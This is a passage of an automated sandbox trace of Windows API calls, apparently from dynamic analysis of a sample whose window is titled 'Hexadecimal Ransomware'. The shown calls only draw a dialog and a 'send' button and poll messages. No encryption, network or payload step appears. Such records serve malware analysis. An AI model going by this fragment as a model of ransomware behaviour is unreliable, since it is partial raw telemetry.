hWnd=0x102d8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0265.191] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xd, wParam=0x5, lParam=0x1591bd0) returned 0x4 [0265.191] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66264) returned 0x102d8 [0265.191] SendMessageW (hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0265.204] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0265.204] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0265.209] IsWindowUnicode (hWnd=0x102d8) returned 1 [0265.209] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.210] GetKeyState (nVirtKey=16) returned 0 [0265.210] GetKeyState (nVirtKey=17) returned 0 [0265.210] GetKeyState (nVirtKey=18) returned -128 [0265.210] TranslateMessage (lpMsg=0x11fed00) returned 1 [0265.210] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.210] GetKeyState (nVirtKey=16) returned 0 [0265.210] GetKeyState (nVirtKey=17) returned 0 [0265.210] GetKeyState (nVirtKey=18) returned -128 [0265.210] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x105, wParam=0x1b, lParam=0xe0010001) returned 0x0 [0265.210] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.211] IsWindowUnicode (hWnd=0x102d8) returned 1 [0265.211] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.211] GetKeyState (nVirtKey=16) returned 0 [0265.211] GetKeyState (nVirtKey=17) returned 0 [0265.211] GetKeyState (nVirtKey=18) returned 0 [0265.211] TranslateMessage (lpMsg=0x11fed00) returned 1 [0265.211] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.211] GetKeyState (nVirtKey=16) returned 0 [0265.211] GetKeyState (nVirtKey=17) returned 0 [0265.211] GetKeyState (nVirtKey=18) returned 0 [0265.211] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x101, wParam=0x12, lParam=0xc0380001) returned 0x0 [0265.211] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.212] IsWindowUnicode (hWnd=0x102d8) returned 1 [0265.212] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.212] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.212] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.212] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.213] IsWindowUnicode (hWnd=0x102d8) returned 1 [0265.213] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.213] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.213] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.214] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0xf0105ee [0265.214] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0265.214] CreateCompatibleDC (hdc=0xf0105ee) returned 0x2c010802 [0265.214] SelectObject (hdc=0x2c010802, h=0xb050815) returned 0x85000f [0265.214] GdipCreateFromHDC (hdc=0x2c010802, graphics=0x11fe760) returned 0x0 [0265.215] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0265.216] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0265.216] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0265.216] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0265.216] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0265.216] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0265.216] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593c38) returned 0x0 [0265.216] LocalFree (hMem=0x1593c38) returned 0x0 [0265.216] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0265.216] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0265.216] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0265.217] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0265.217] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0265.217] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd830dbd) returned 0x0 [0265.217] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0265.217] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0265.218] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.218] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.218] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.218] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.218] SaveDC (hdc=0x2c010802) returned 1 [0265.218] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.218] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.218] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.218] GetNearestColor (hdc=0x2c010802, color=0x989898) returned 0x989898 [0265.218] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.218] GetNearestColor (hdc=0x2c010802, color=0x7f7f7f) returned 0x7f7f7f [0265.218] GetNearestColor (hdc=0x2c010802, color=0x989898) returned 0x989898 [0265.219] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.219] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.219] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.219] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2c010802) returned 0x0 [0265.219] IsAppThemed () returned 0x1 [0265.219] GetThemeAppProperties () returned 0x3 [0265.219] GetThemeAppProperties () returned 0x3 [0265.220] IsAppThemed () returned 0x1 [0265.220] GetThemeAppProperties () returned 0x3 [0265.220] GetThemeAppProperties () returned 0x3 [0265.220] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x3357c60 | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0265.222] IsAppThemed () returned 0x1 [0265.222] GetThemeAppProperties () returned 0x3 [0265.222] GetThemeAppProperties () returned 0x3 [0265.223] IsAppThemed () returned 0x1 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] GetFocus () returned 0x102d8 [0265.223] IsAppThemed () returned 0x1 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] IsAppThemed () returned 0x1 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] IsThemePartDefined () returned 0x1 [0265.223] IsAppThemed () returned 0x1 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] GetThemeAppProperties () returned 0x3 [0265.223] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0265.224] IsAppThemed () returned 0x1 [0265.224] GetThemeAppProperties () returned 0x3 [0265.224] GetThemeAppProperties () returned 0x3 [0265.224] IsAppThemed () returned 0x1 [0265.224] GetThemeAppProperties () returned 0x3 [0265.224] GetThemeAppProperties () returned 0x3 [0265.224] IsThemePartDefined () returned 0x1 [0265.224] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0265.224] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0265.224] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0265.224] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0265.224] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0265.224] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0265.224] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0265.224] LocalFree (hMem=0x1593ea0) returned 0x0 [0265.224] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0265.224] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0265.224] LocalFree (hMem=0x1593c38) returned 0x0 [0265.224] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0265.224] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0265.225] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0265.225] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0265.225] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0265.225] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0265.225] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.225] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.225] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.225] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.225] SaveDC (hdc=0x2c010802) returned 1 [0265.225] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3904081c [0265.225] GetClipRgn (hdc=0x2c010802, hrgn=0x3904081c) returned 0 [0265.225] SelectClipRgn (hdc=0x2c010802, hrgn=0x4d040825) returned 2 [0265.225] DeleteObject (ho=0x3904081c) returned 1 [0265.225] DeleteObject (ho=0x4d040825) returned 1 [0265.225] OffsetViewportOrgEx (in: hdc=0x2c010802, x=0, y=0, lppt=0x3358310 | out: lppt=0x3358310) returned 1 [0265.225] DrawThemeParentBackground () returned 0x0 [0265.226] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0265.226] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0265.226] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0265.226] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0265.226] GetSystemMetrics (nIndex=42) returned 0 [0265.226] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0265.226] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0265.226] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0265.226] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.226] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.226] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.226] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.226] SaveDC (hdc=0x2c010802) returned 2 [0265.226] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.226] CreateSolidBrush (color=0x0) returned 0x2d100826 [0265.226] FillRect (hDC=0x2c010802, lprc=0x11fdf30, hbr=0x2d100826) returned 1 [0265.227] DeleteObject (ho=0x2d100826) returned 1 [0265.227] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.227] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0265.227] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0265.227] GetSystemMetrics (nIndex=42) returned 0 [0265.227] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0265.227] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0265.227] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0265.227] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.227] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.227] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.227] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.227] SaveDC (hdc=0x2c010802) returned 2 [0265.227] GetNearestColor (hdc=0x2c010802, color=0x0) returned 0x0 [0265.227] CreateSolidBrush (color=0x0) returned 0x2e100826 [0265.227] FillRect (hDC=0x2c010802, lprc=0x11fded0, hbr=0x2e100826) returned 1 [0265.228] DeleteObject (ho=0x2e100826) returned 1 [0265.228] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.228] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0265.228] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0265.228] GetSystemMetrics (nIndex=42) returned 0 [0265.228] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0265.228] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0265.228] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.228] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2c010802) returned 0x0 [0265.228] IsAppThemed () returned 0x1 [0265.228] GetThemeAppProperties () returned 0x3 [0265.228] GetThemeAppProperties () returned 0x3 [0265.228] IsAppThemed () returned 0x1 [0265.228] GetThemeAppProperties () returned 0x3 [0265.228] GetThemeAppProperties () returned 0x3 [0265.228] IsThemePartDefined () returned 0x1 [0265.228] GdipCreateRegion (region=0x11fe454) returned 0x0 [0265.228] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0265.228] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0265.229] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0265.229] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0265.229] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0265.229] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0265.229] LocalFree (hMem=0x1593c38) returned 0x0 [0265.229] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0265.229] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0265.229] LocalFree (hMem=0x1593c38) returned 0x0 [0265.229] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0265.229] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0265.229] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0265.229] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0265.229] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0265.229] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0265.229] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.229] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.229] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.229] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.229] SaveDC (hdc=0x2c010802) returned 1 [0265.229] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x4e040825 [0265.230] GetClipRgn (hdc=0x2c010802, hrgn=0x4e040825) returned 0 [0265.230] SelectClipRgn (hdc=0x2c010802, hrgn=0x3b04081c) returned 2 [0265.230] DeleteObject (ho=0x4e040825) returned 1 [0265.230] DeleteObject (ho=0x3b04081c) returned 1 [0265.230] OffsetViewportOrgEx (in: hdc=0x2c010802, x=0, y=0, lppt=0x3358cd0 | out: lppt=0x3358cd0) returned 1 [0265.230] IsAppThemed () returned 0x1 [0265.230] GetThemeAppProperties () returned 0x3 [0265.230] GetThemeAppProperties () returned 0x3 [0265.230] DrawThemeBackground () returned 0x0 [0265.230] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.230] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2c010802) returned 0x0 [0265.230] GdipCreateRegion (region=0x11fe458) returned 0x0 [0265.230] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0265.230] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0265.230] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0265.230] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0265.230] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0265.231] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0265.231] LocalFree (hMem=0x1593ea0) returned 0x0 [0265.231] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0265.231] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0265.231] LocalFree (hMem=0x1593c38) returned 0x0 [0265.231] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0265.231] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0265.231] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0265.231] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0265.231] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0265.231] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0265.231] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.231] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.231] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.231] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.231] SaveDC (hdc=0x2c010802) returned 1 [0265.231] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3c04081c [0265.231] GetClipRgn (hdc=0x2c010802, hrgn=0x3c04081c) returned 0 [0265.231] SelectClipRgn (hdc=0x2c010802, hrgn=0x4f040825) returned 2 [0265.232] DeleteObject (ho=0x3c04081c) returned 1 [0265.232] DeleteObject (ho=0x4f040825) returned 1 [0265.232] OffsetViewportOrgEx (in: hdc=0x2c010802, x=0, y=0, lppt=0x3358fa4 | out: lppt=0x3358fa4) returned 1 [0265.232] IsAppThemed () returned 0x1 [0265.232] GetThemeAppProperties () returned 0x3 [0265.232] GetThemeAppProperties () returned 0x3 [0265.232] GetThemeBackgroundContentRect () returned 0x0 [0265.232] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.232] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2c010802) returned 0x0 [0265.232] IsAppThemed () returned 0x1 [0265.232] GetThemeAppProperties () returned 0x3 [0265.232] GetThemeAppProperties () returned 0x3 [0265.232] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0265.232] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0265.232] GetCurrentObject (hdc=0x2c010802, type=0x1) returned 0xb00017 [0265.232] GetCurrentObject (hdc=0x2c010802, type=0x2) returned 0x900010 [0265.232] GetCurrentObject (hdc=0x2c010802, type=0x7) returned 0xb050815 [0265.232] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.232] SaveDC (hdc=0x2c010802) returned 1 [0265.233] GetTextAlign (hdc=0x2c010802) returned 0x0 [0265.233] GetTextColor (hdc=0x2c010802) returned 0x0 [0265.233] GetCurrentObject (hdc=0x2c010802, type=0x6) returned 0x8a01c2 [0265.233] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0265.233] SelectObject (hdc=0x2c010802, h=0x170a07ff) returned 0x8a01c2 [0265.233] GetBkMode (hdc=0x2c010802) returned 2 [0265.233] SetBkMode (hdc=0x2c010802, mode=1) returned 2 [0265.233] DrawTextExW (in: hdc=0x2c010802, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x3359344 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0265.234] DrawTextExW (in: hdc=0x2c010802, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x3359344 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0265.236] RestoreDC (hdc=0x2c010802, nSavedDC=-1) returned 1 [0265.236] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2c010802) returned 0x0 [0265.236] GetFocus () returned 0x102d8 [0265.236] IsAppThemed () returned 0x1 [0265.236] GetThemeAppProperties () returned 0x3 [0265.236] GetThemeAppProperties () returned 0x3 [0265.236] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0265.236] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=64, cy=25, hdcSrc=0x2c010802, x1=0, y1=0, rop=0xcc0020) returned 1 [0265.237] GdipReleaseDC (graphics=0x6e19d80, hdc=0x2c010802) returned 0x0 [0265.237] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0265.237] SelectObject (hdc=0x2c010802, h=0x85000f) returned 0xb050815 [0265.237] DeleteDC (hdc=0x2c010802) returned 1 [0265.237] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0265.237] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0265.237] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.237] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.237] WaitMessage () returned 1 [0265.251] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.251] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.251] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.251] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.251] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.252] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.252] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.252] WaitMessage () returned 1 [0265.253] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.253] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.253] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.253] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.253] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.254] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.254] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.254] WaitMessage () returned 1 [0265.314] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.314] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.314] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.314] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0265.314] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.314] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.314] WaitMessage () returned 1 [0265.334] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.334] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.334] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.334] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.334] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.335] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.338] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.338] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.338] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.338] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.338] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.338] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.338] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.338] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.338] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.338] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.339] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0265.339] WaitMessage () returned 1 [0265.339] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.339] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.339] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.339] TranslateMessage (lpMsg=0x11fed00) returned 0 [0265.339] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0265.341] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0265.342] IsWindowUnicode (hWnd=0x202e6) returned 1 [0265.342] GetMessageW (in: 